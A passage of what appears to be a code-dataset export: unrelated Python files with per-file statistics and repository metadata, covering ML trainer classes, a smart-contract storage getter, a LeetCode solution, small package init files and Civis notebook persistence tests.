        needs_threshold: Union[bool, SEQUENCE_TYPES] = False,
        n_calls: Union[INT, SEQUENCE_TYPES] = 0,
        n_initial_points: Union[INT, SEQUENCE_TYPES] = 5,
        est_params: Optional[dict] = None,
        bo_params: Optional[dict] = None,
        n_bootstrap: Union[INT, SEQUENCE_TYPES] = 0,
        n_jobs: INT = 1,
        verbose: INT = 0,
        warnings: Union[bool, str] = True,
        logger: Optional[Union[str, callable]] = None,
        experiment: Optional[str] = None,
        gpu: Union[bool, str] = False,
        random_state: Optional[INT] = None,
    ):
        """Set the classification goal and delegate everything to Direct."""
        self.goal = "class"
        super().__init__(
            models=models, metric=metric, greater_is_better=greater_is_better,
            needs_proba=needs_proba, needs_threshold=needs_threshold,
            n_calls=n_calls, n_initial_points=n_initial_points,
            est_params=est_params, bo_params=bo_params, n_bootstrap=n_bootstrap,
            n_jobs=n_jobs, verbose=verbose, warnings=warnings, logger=logger,
            experiment=experiment, gpu=gpu, random_state=random_state,
        )
class DirectRegressor(Direct):
    """Direct trainer for regression tasks."""
    @typechecked
    def __init__(
        self,
        models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
        metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
        greater_is_better: Union[bool, SEQUENCE_TYPES] = True,
        needs_proba: Union[bool, SEQUENCE_TYPES] = False,
        needs_threshold: Union[bool, SEQUENCE_TYPES] = False,
        n_calls: Union[INT, SEQUENCE_TYPES] = 0,
        n_initial_points: Union[INT, SEQUENCE_TYPES] = 5,
        est_params: Optional[dict] = None,
        bo_params: Optional[dict] = None,
        n_bootstrap: Union[INT, SEQUENCE_TYPES] = 0,
        n_jobs: INT = 1,
        verbose: INT = 0,
        warnings: Union[bool, str] = True,
        logger: Optional[Union[str, callable]] = None,
        experiment: Optional[str] = None,
        gpu: Union[bool, str] = False,
        random_state: Optional[INT] = None,
    ):
        """Set the regression goal and delegate everything to Direct."""
        self.goal = "reg"
        super().__init__(
            models=models, metric=metric, greater_is_better=greater_is_better,
            needs_proba=needs_proba, needs_threshold=needs_threshold,
            n_calls=n_calls, n_initial_points=n_initial_points,
            est_params=est_params, bo_params=bo_params, n_bootstrap=n_bootstrap,
            n_jobs=n_jobs, verbose=verbose, warnings=warnings, logger=logger,
            experiment=experiment, gpu=gpu, random_state=random_state,
        )
class SuccessiveHalvingClassifier(SuccessiveHalving):
    """SuccessiveHalving trainer for classification tasks."""
    @typechecked
    def __init__(
        self,
        models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
        metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
        greater_is_better: Union[bool, SEQUENCE_TYPES] = True,
        needs_proba: Union[bool, SEQUENCE_TYPES] = False,
        needs_threshold: Union[bool, SEQUENCE_TYPES] = False,
        skip_runs: INT = 0,
        n_calls: Union[INT, SEQUENCE_TYPES] = 0,
        n_initial_points: Union[INT, SEQUENCE_TYPES] = 5,
        est_params: Optional[dict] = None,
        bo_params: Optional[dict] = None,
        n_bootstrap: Union[INT, SEQUENCE_TYPES] = 0,
        n_jobs: INT = 1,
        verbose: INT = 0,
        warnings: Union[bool, str] = True,
        logger: Optional[Union[str, callable]] = None,
        experiment: Optional[str] = None,
        gpu: Union[bool, str] = False,
        random_state: Optional[INT] = None,
    ):
        """Set the classification goal and delegate to SuccessiveHalving."""
        self.goal = "class"
        super().__init__(
            models=models, metric=metric, greater_is_better=greater_is_better,
            needs_proba=needs_proba, needs_threshold=needs_threshold,
            skip_runs=skip_runs, n_calls=n_calls,
            n_initial_points=n_initial_points, est_params=est_params,
            bo_params=bo_params, n_bootstrap=n_bootstrap, n_jobs=n_jobs,
            verbose=verbose, warnings=warnings, logger=logger,
            experiment=experiment, gpu=gpu, random_state=random_state,
        )
class SuccessiveHalvingRegressor(SuccessiveHalving):
    """SuccessiveHalving trainer for regression tasks."""
    @typechecked
    def __init__(
        self,
        models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
        metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
        greater_is_better: Union[bool, SEQUENCE_TYPES] = True,
        needs_proba: Union[bool, SEQUENCE_TYPES] = False,
        needs_threshold: Union[bool, SEQUENCE_TYPES] = False,
        skip_runs: INT = 0,
        n_calls: Union[INT, SEQUENCE_TYPES] = 0,
        n_initial_points: Union[INT, SEQUENCE_TYPES] = 5,
        est_params: Optional[dict] = None,
        bo_params: Optional[dict] = None,
        n_bootstrap: Union[INT, SEQUENCE_TYPES] = 0,
        n_jobs: INT = 1,
        verbose: INT = 0,
        warnings: Union[bool, str] = True,
        logger: Optional[Union[str, callable]] = None,
        experiment: Optional[str] = None,
        gpu: Union[bool, str] = False,
        random_state: Optional[INT] = None,
    ):
        """Set the regression goal and delegate to SuccessiveHalving."""
        self.goal = "reg"
        super().__init__(
            models=models, metric=metric, greater_is_better=greater_is_better,
            needs_proba=needs_proba, needs_threshold=needs_threshold,
            skip_runs=skip_runs, n_calls=n_calls,
            n_initial_points=n_initial_points, est_params=est_params,
            bo_params=bo_params, n_bootstrap=n_bootstrap, n_jobs=n_jobs,
            verbose=verbose, warnings=warnings, logger=logger,
            experiment=experiment, gpu=gpu, random_state=random_state,
        )
class TrainSizingClassifier(TrainSizing):
    """TrainSizing trainer for classification tasks."""
    @typechecked
    def __init__(
        self,
        models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
        metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
        greater_is_better: Union[bool, SEQUENCE_TYPES] = True,
        needs_proba: Union[bool, SEQUENCE_TYPES] = False,
        needs_threshold: Union[bool, SEQUENCE_TYPES] = False,
        train_sizes: Union[INT, SEQUENCE_TYPES] = 5,
        n_calls: Union[INT, SEQUENCE_TYPES] = 0,
        n_initial_points: Union[INT, SEQUENCE_TYPES] = 5,
        est_params: Optional[dict] = None,
        bo_params: Optional[dict] = None,
        n_bootstrap: Union[INT, SEQUENCE_TYPES] = 0,
        n_jobs: INT = 1,
        verbose: INT = 0,
        warnings: Union[bool, str] = True,
        logger: Optional[Union[str, callable]] = None,
        experiment: Optional[str] = None,
        gpu: Union[bool, str] = False,
        random_state: Optional[INT] = None,
    ):
        """Set the classification goal and delegate to TrainSizing."""
        self.goal = "class"
        super().__init__(
            models=models, metric=metric, greater_is_better=greater_is_better,
            needs_proba=needs_proba, needs_threshold=needs_threshold,
            train_sizes=train_sizes, n_calls=n_calls,
            n_initial_points=n_initial_points, est_params=est_params,
            bo_params=bo_params, n_bootstrap=n_bootstrap, n_jobs=n_jobs,
            verbose=verbose, warnings=warnings, logger=logger,
            experiment=experiment, gpu=gpu, random_state=random_state,
        )
class TrainSizingRegressor(TrainSizing):
    """TrainSizing trainer for regression tasks."""
    @typechecked
    def __init__(
        self,
        models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
        metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
        greater_is_better: Union[bool, SEQUENCE_TYPES] = True,
        needs_proba: Union[bool, SEQUENCE_TYPES] = False,
        needs_threshold: Union[bool, SEQUENCE_TYPES] = False,
        train_sizes: Union[INT, SEQUENCE_TYPES] = 5,
        n_calls: Union[INT, SEQUENCE_TYPES] = 0,
        n_initial_points: Union[INT, SEQUENCE_TYPES] = 5,
        est_params: Optional[dict] = None,
        bo_params: Optional[dict] = None,
        n_bootstrap: Union[INT, SEQUENCE_TYPES] = 0,
        n_jobs: INT = 1,
        verbose: INT = 0,
        warnings: Union[bool, str] = True,
        logger: Optional[Union[str, callable]] = None,
        experiment: Optional[str] = None,
        gpu: Union[bool, str] = False,
        random_state: Optional[INT] = None,
    ):
        """Set the regression goal and delegate to TrainSizing."""
        self.goal = "reg"
        super().__init__(
            models=models, metric=metric, greater_is_better=greater_is_better,
            needs_proba=needs_proba, needs_threshold=needs_threshold,
            train_sizes=train_sizes, n_calls=n_calls,
            n_initial_points=n_initial_points, est_params=est_params,
            bo_params=bo_params, n_bootstrap=n_bootstrap, n_jobs=n_jobs,
            verbose=verbose, warnings=warnings, logger=logger,
            experiment=experiment, gpu=gpu, random_state=random_state,
        )
| 39.013333
| 87
| 0.619332
| 2,176
| 17,556
| 4.779412
| 0.129596
| 0.06375
| 0.032308
| 0.040385
| 0.723654
| 0.719423
| 0.711538
| 0.704904
| 0.690769
| 0.675385
| 0
| 0.006626
| 0.277854
| 17,556
| 449
| 88
| 39.100223
| 0.813693
| 0.187799
| 0
| 0.738255
| 0
| 0
| 0.035998
| 0.005566
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040268
| false
| 0
| 0.030201
| 0
| 0.100671
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
9c1cba9c84ef96879bfa2ce2d9a510d55f04873d
| 98
|
py
|
Python
|
boa3_test/test_sc/interop_test/storage/StorageGetBytesKey.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 25
|
2020-07-22T19:37:43.000Z
|
2022-03-08T03:23:55.000Z
|
boa3_test/test_sc/interop_test/storage/StorageGetBytesKey.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 419
|
2020-04-23T17:48:14.000Z
|
2022-03-31T13:17:45.000Z
|
boa3_test/test_sc/interop_test/storage/StorageGetBytesKey.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 15
|
2020-05-21T21:54:24.000Z
|
2021-11-18T06:17:24.000Z
|
from boa3.builtin.interop.storage import get
def Main(key: bytes) -> bytes:
    """Return the contract-storage value stored under *key*."""
    value = get(key)
    return value
| 16.333333
| 44
| 0.714286
| 15
| 98
| 4.666667
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012346
| 0.173469
| 98
| 5
| 45
| 19.6
| 0.851852
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
|
0
| 5
|
9c30cb1be89521a8ccf2a1a3705163bf15ec3b26
| 20
|
py
|
Python
|
Calculator /app/ext.py
|
18853477039/social
|
368b5b492a0fe6c64925a79d3eaf2aa307b2b9b3
|
[
"Apache-2.0"
] | null | null | null |
Calculator /app/ext.py
|
18853477039/social
|
368b5b492a0fe6c64925a79d3eaf2aa307b2b9b3
|
[
"Apache-2.0"
] | null | null | null |
Calculator /app/ext.py
|
18853477039/social
|
368b5b492a0fe6c64925a79d3eaf2aa307b2b9b3
|
[
"Apache-2.0"
] | null | null | null |
# Initialize the Flask extensions used in the project
| 6.666667
| 18
| 0.8
| 1
| 20
| 16
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15
| 20
| 2
| 19
| 10
| 0.941176
| 0.8
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
9c3aeb014ac12b06e4afb3fcbc4a86c80feb4960
| 139
|
py
|
Python
|
codes_/0069_Sqrtx.py
|
SaitoTsutomu/leetcode
|
4656d66ab721a5c7bc59890db9a2331c6823b2bf
|
[
"MIT"
] | null | null | null |
codes_/0069_Sqrtx.py
|
SaitoTsutomu/leetcode
|
4656d66ab721a5c7bc59890db9a2331c6823b2bf
|
[
"MIT"
] | null | null | null |
codes_/0069_Sqrtx.py
|
SaitoTsutomu/leetcode
|
4656d66ab721a5c7bc59890db9a2331c6823b2bf
|
[
"MIT"
] | null | null | null |
# %% [69. Sqrt(x)](https://leetcode.com/problems/sqrtx/)
class Solution:
    def mySqrt(self, x: int) -> int:
        """Return the integer square root (floor of sqrt) of x.

        Bug fix: int(x ** 0.5) is wrong for large x because the float
        conversion rounds (e.g. x = 10**16 - 1 gave 100000000 instead of
        99999999). math.isqrt computes the exact result in integer arithmetic.
        """
        from math import isqrt  # local import: this file has no import section
        return isqrt(x)
| 27.8
| 56
| 0.582734
| 21
| 139
| 3.857143
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036036
| 0.201439
| 139
| 4
| 57
| 34.75
| 0.693694
| 0.388489
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
9c43e16a892ffd747d249faa2779c1e9708fc405
| 164
|
py
|
Python
|
src/account/admin.py
|
rahulroshan96/CloudVisual
|
aa33709d88442bcdbe3229234b4eb4f9abb4481e
|
[
"MIT",
"Unlicense"
] | 2
|
2019-03-17T18:04:32.000Z
|
2019-03-20T11:05:57.000Z
|
src/account/admin.py
|
rahulroshan96/CloudVisual
|
aa33709d88442bcdbe3229234b4eb4f9abb4481e
|
[
"MIT",
"Unlicense"
] | 4
|
2020-06-05T19:43:52.000Z
|
2021-06-01T23:15:44.000Z
|
src/account/admin.py
|
rahulroshan96/CloudVisual
|
aa33709d88442bcdbe3229234b4eb4f9abb4481e
|
[
"MIT",
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import Credentials
# Expose the Credentials model in the Django admin with the default ModelAdmin.
admin.site.register(Credentials)
| 20.5
| 39
| 0.786585
| 21
| 164
| 5.904762
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006944
| 0.121951
| 164
| 7
| 40
| 23.428571
| 0.854167
| 0.128049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
92c00de14450eb5be4e038d9bc96d5a7a153f392
| 199
|
py
|
Python
|
bindings/pydeck-carto/pydeck_carto/__init__.py
|
ehtick/deck.gl
|
ac59a28a6ff03000072f11c9a5520eb87f11944c
|
[
"MIT"
] | null | null | null |
bindings/pydeck-carto/pydeck_carto/__init__.py
|
ehtick/deck.gl
|
ac59a28a6ff03000072f11c9a5520eb87f11944c
|
[
"MIT"
] | null | null | null |
bindings/pydeck-carto/pydeck_carto/__init__.py
|
ehtick/deck.gl
|
ac59a28a6ff03000072f11c9a5520eb87f11944c
|
[
"MIT"
] | null | null | null |
from ._version import __version__
from .layer import register_carto_layer
from .credentials import load_carto_credentials
# Explicit public API of the pydeck_carto package.
__all__ = ["__version__", "load_carto_credentials", "register_carto_layer"]
| 33.166667
| 75
| 0.839196
| 24
| 199
| 6.083333
| 0.375
| 0.178082
| 0.246575
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090452
| 199
| 5
| 76
| 39.8
| 0.80663
| 0
| 0
| 0
| 0
| 0
| 0.266332
| 0.110553
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
92d3a49cf9aaff83c2c0f9c4fe08a7917c192b39
| 130
|
py
|
Python
|
odziez/orders/admin.py
|
szymanskirafal/odziez
|
029d20da0474a0380e8383f9f89c1072666c5399
|
[
"MIT"
] | null | null | null |
odziez/orders/admin.py
|
szymanskirafal/odziez
|
029d20da0474a0380e8383f9f89c1072666c5399
|
[
"MIT"
] | null | null | null |
odziez/orders/admin.py
|
szymanskirafal/odziez
|
029d20da0474a0380e8383f9f89c1072666c5399
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Order
@admin.register(Order)
class OrderAdmin(admin.ModelAdmin):
    """Admin registration for the Order model; default options only."""
| 14.444444
| 35
| 0.776923
| 17
| 130
| 5.941176
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146154
| 130
| 8
| 36
| 16.25
| 0.90991
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 5
|
132b08ebede269ef32c2443c13ad4eb5564eb44b
| 112
|
py
|
Python
|
env/lib/python3.6/site-packages/Levenshtein/__init__.py
|
anthowen/duplify
|
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
|
[
"MIT"
] | 5
|
2016-03-28T20:29:44.000Z
|
2018-01-15T17:48:22.000Z
|
env/lib/python3.6/site-packages/Levenshtein/__init__.py
|
anthowen/duplify
|
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
|
[
"MIT"
] | 9
|
2016-03-18T01:07:40.000Z
|
2016-06-15T21:17:08.000Z
|
env/lib/python3.6/site-packages/Levenshtein/__init__.py
|
anthowen/duplify
|
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
|
[
"MIT"
] | 3
|
2016-01-09T13:51:10.000Z
|
2017-11-06T13:34:03.000Z
|
from Levenshtein import _levenshtein
from Levenshtein._levenshtein import *
# Re-export the C extension module's docstring as this package's docstring.
__doc__ = _levenshtein.__doc__
| 22.4
| 38
| 0.821429
| 11
| 112
| 7.363636
| 0.363636
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 112
| 4
| 39
| 28
| 0.84375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
137b2e857aeba6a0c59e4b46b0fffd2953ab5977
| 109
|
py
|
Python
|
libpycr/builtin/changes/__init__.py
|
JcDelay/pycr
|
f729e003473b421b76bc49c5d55d06d7086d63cc
|
[
"Apache-2.0"
] | 1
|
2015-03-12T10:34:38.000Z
|
2015-03-12T10:34:38.000Z
|
libpycr/builtin/changes/__init__.py
|
JcDelay/pycr
|
f729e003473b421b76bc49c5d55d06d7086d63cc
|
[
"Apache-2.0"
] | null | null | null |
libpycr/builtin/changes/__init__.py
|
JcDelay/pycr
|
f729e003473b421b76bc49c5d55d06d7086d63cc
|
[
"Apache-2.0"
] | null | null | null |
"""git-cl builtins"""
import libpycr.builtin.util
# __all__ is computed by libpycr.builtin.util.find_all from this package's
# path — presumably it discovers the sibling builtin modules; confirm there.
__all__ = tuple(libpycr.builtin.util.find_all(__file__))
| 18.166667
| 56
| 0.761468
| 15
| 109
| 4.933333
| 0.733333
| 0.378378
| 0.486486
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082569
| 109
| 5
| 57
| 21.8
| 0.74
| 0.137615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
1393b486ac4b2ba1dbf6fe0a126f6541fd6ff7a7
| 12,767
|
py
|
Python
|
civis_jupyter_notebooks/tests/test_platform_persistence.py
|
civisanalytics/civis-jupyter-notebook
|
16e3fb804c53e7e146aeebe0cc56192ad51dc668
|
[
"BSD-3-Clause"
] | 1
|
2020-05-20T10:17:32.000Z
|
2020-05-20T10:17:32.000Z
|
civis_jupyter_notebooks/tests/test_platform_persistence.py
|
civisanalytics/civis-jupyter-notebook
|
16e3fb804c53e7e146aeebe0cc56192ad51dc668
|
[
"BSD-3-Clause"
] | 26
|
2017-09-08T20:59:00.000Z
|
2021-08-23T19:42:22.000Z
|
civis_jupyter_notebooks/tests/test_platform_persistence.py
|
civisanalytics/civis-jupyter-notebook
|
16e3fb804c53e7e146aeebe0cc56192ad51dc668
|
[
"BSD-3-Clause"
] | 4
|
2017-09-13T20:44:09.000Z
|
2020-01-22T21:24:53.000Z
|
import os
import subprocess
import nbformat
import requests
import unittest
from unittest.mock import ANY, MagicMock, patch
import logging
from civis_jupyter_notebooks import platform_persistence
from civis_jupyter_notebooks.platform_persistence import NotebookManagementError
# Fixed identifiers used by every test case below.
TEST_NOTEBOOK_PATH = '/path/to/notebook.ipynb'
TEST_PLATFORM_OBJECT_ID = '1914'
# Raw .ipynb payloads served by the mocked requests.get responses.
SAMPLE_NOTEBOOK = open(os.path.join(os.path.dirname(__file__), 'fixtures/sample_notebook.ipynb')).read()
SAMPLE_NEW_NOTEBOOK = open(os.path.join(os.path.dirname(__file__), 'fixtures/sample_new_notebook.ipynb')).read()
class NotebookWithoutNewFlag(nbformat.NotebookNode):
    """Equality matcher: equal to any notebook whose metadata.civis.new_notebook flag is falsy."""
    def __eq__(self, other):
        civis_meta = other.get('metadata', {}).get('civis', {})
        return not civis_meta.get('new_notebook', False)
class PlatformPersistenceTest(unittest.TestCase):
    def setUp(self):
        # Provide the env vars platform_persistence reads and silence INFO logs.
        os.environ['CIVIS_API_KEY'] = 'hi mom'
        os.environ['PLATFORM_OBJECT_ID'] = TEST_PLATFORM_OBJECT_ID
        logging.disable(logging.INFO)
    # Decorators apply bottom-up: rg = requests.get, _client = civis.APIClient, etc.
    @patch('os.makedirs')
    @patch('civis_jupyter_notebooks.platform_persistence.open')
    @patch('civis.APIClient')
    @patch('civis_jupyter_notebooks.platform_persistence.requests.get')
    def test_initialize_notebook_will_get_nb_from_platform(self, rg, _client, _op, _makedirs):
        # A 200 response with a valid notebook lets initialization proceed,
        # and the notebook object must be fetched by its platform ID.
        rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NOTEBOOK)
        platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
        platform_persistence.get_client().notebooks.get.assert_called_with(TEST_PLATFORM_OBJECT_ID)
    @patch('os.makedirs')
    @patch('civis_jupyter_notebooks.platform_persistence.open')
    @patch('civis_jupyter_notebooks.platform_persistence.__pull_and_load_requirements')
    @patch('civis.APIClient')
    @patch('civis_jupyter_notebooks.platform_persistence.requests.get')
    def test_initialize_notebook_will_pull_nb_from_url(self, rg, _client, requirements, _op, _makedirs):
        # The notebook body must be downloaded from notebook_url, and with
        # requirements_url set to None no requirements pull should happen.
        url = 'http://whatever'
        rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NOTEBOOK)
        platform_persistence.get_client().notebooks.get.return_value.notebook_url = url
        platform_persistence.get_client().notebooks.get.return_value.requirements_url = None
        platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
        rg.assert_called_with(url)
        requirements.assert_not_called()
    @patch('os.makedirs')
    @patch('civis_jupyter_notebooks.platform_persistence.open')
    @patch('civis.APIClient')
    @patch('civis_jupyter_notebooks.platform_persistence.requests.get')
    def test_initialize_notebook_will_throw_error_on_nb_pull(self, rg, _client, _op, _makedirs):
        # A 500 response from the notebook download must surface as
        # NotebookManagementError.
        rg.return_value = MagicMock(spec=requests.Response, status_code=500, response={})
        self.assertRaises(NotebookManagementError,
                          lambda: platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH))
    @patch('nbformat.write')
    @patch('os.makedirs')
    @patch('civis_jupyter_notebooks.platform_persistence.open')
    @patch('civis.APIClient')
    @patch('civis_jupyter_notebooks.platform_persistence.requests.get')
    def test_initialize_notebook_will_set_new_notebook_flag_to_false(self, rg, _client, _op, _makedirs, nbwrite):
        # NOTE(review): 'notebooks_url' here vs 'notebook_url' in the
        # pull-from-url test above — one spelling is likely a typo; confirm
        # against platform_persistence before changing either.
        rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NEW_NOTEBOOK)
        platform_persistence.get_client().notebooks.get.return_value.notebooks_url = 'something'
        platform_persistence.get_client().notebooks.get.return_value.requirements_url = None
        platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
        # The written notebook must no longer carry the new_notebook flag.
        nbwrite.assert_called_with(NotebookWithoutNewFlag(), ANY)
    @patch('os.path.isfile')
    @patch('nbformat.write')
    @patch('os.makedirs')
    @patch('civis_jupyter_notebooks.platform_persistence.open')
    @patch('civis.APIClient')
    @patch('civis_jupyter_notebooks.platform_persistence.requests.get')
    def test_initialize_notebook_will_use_s3_notebook_if_not_new_and_git_notebook_exists(self, rg, _client, _op,
                                                                                         _makedirs, nbwrite, isfile):
        # A non-new notebook is still written out even when a local (git)
        # notebook file already exists (isfile -> True).
        rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NOTEBOOK)
        platform_persistence.get_client().notebooks.get.return_value.notebooks_url = 'something'
        platform_persistence.get_client().notebooks.get.return_value.requirements_url = None
        isfile.return_value = True
        platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
        nbwrite.assert_called_with(ANY, ANY)
    @patch('os.path.isfile')
    @patch('nbformat.write')
    @patch('os.makedirs')
    @patch('civis_jupyter_notebooks.platform_persistence.open')
    @patch('civis.APIClient')
    @patch('civis_jupyter_notebooks.platform_persistence.requests.get')
    def test_initialize_notebook_will_discard_s3_notebook_if_new_and_git_notebook_exists(self, rg, _client, _op,
                                                                                         _makedirs, nbwrite, isfile):
        # A *new* notebook must be discarded (not written) when a local (git)
        # notebook file already exists (isfile -> True).
        rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NEW_NOTEBOOK)
        platform_persistence.get_client().notebooks.get.return_value.notebooks_url = 'something'
        platform_persistence.get_client().notebooks.get.return_value.requirements_url = None
        isfile.return_value = True
        platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
        nbwrite.assert_not_called()
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis.APIClient')
@patch('os.makedirs')
@patch('civis_jupyter_notebooks.platform_persistence.requests.get')
def test_initialize_notebook_will_create_directories_if_needed(self, rg, makedirs, _client, _op):
    """Initialization creates the notebook's parent directory before writing."""
    rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NOTEBOOK)
    platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
    # The directory passed to os.makedirs must be the notebook's dirname.
    directory = os.path.dirname(TEST_NOTEBOOK_PATH)
    makedirs.assert_called_with(directory)
@patch('os.makedirs')
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.__pull_and_load_requirements')
@patch('civis.APIClient')
@patch('civis_jupyter_notebooks.platform_persistence.requests.get')
def test_initialize_notebook_will_pull_requirements(self, rg, _client, requirements, _op, _makedirs):
    """When the platform exposes a requirements_url it is pulled via __pull_and_load_requirements."""
    url = 'http://whatever'
    rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NOTEBOOK)
    # Expose a requirements file URL on the mocked notebook record.
    platform_persistence.get_client().notebooks.get.return_value.requirements_url = url
    platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
    requirements.assert_called_with(url, TEST_NOTEBOOK_PATH)
@patch('os.makedirs')
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.__pull_and_load_requirements')
@patch('civis.APIClient')
@patch('civis_jupyter_notebooks.platform_persistence.requests.get')
